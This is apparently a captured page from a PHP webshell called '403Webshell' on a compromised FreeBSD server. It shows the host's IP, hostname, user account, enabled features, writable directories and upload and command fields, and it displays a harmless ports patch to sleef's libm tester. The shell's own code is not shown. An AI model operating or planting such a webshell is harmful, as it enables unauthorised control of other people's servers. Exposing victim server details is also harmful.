403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/math/sleef/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/math/sleef/files/patch-src_libm-tester_iutsimdmain.c
--- src/libm-tester/iutsimdmain.c.orig	2021-11-18 16:48:35 UTC
+++ src/libm-tester/iutsimdmain.c
@@ -9,16 +9,16 @@
 #include <signal.h>
 #include <setjmp.h>
 
-static jmp_buf sigjmp;
-
 int do_test(int argc, char **argv);
 int check_featureDP(double d);
 int check_featureSP(float d);
 
 #if defined(_MSC_VER) || defined(__MINGW32__) || defined(__MINGW64__)
+static jmp_buf sigjmp;
 #define SETJMP(x) setjmp(x)
 #define LONGJMP longjmp
 #else
+static sigjmp_buf sigjmp;
 #define SETJMP(x) sigsetjmp(x, 1)
 #define LONGJMP siglongjmp
 #endif

Youez - 2016 - github.com/yon3zu
LinuXploit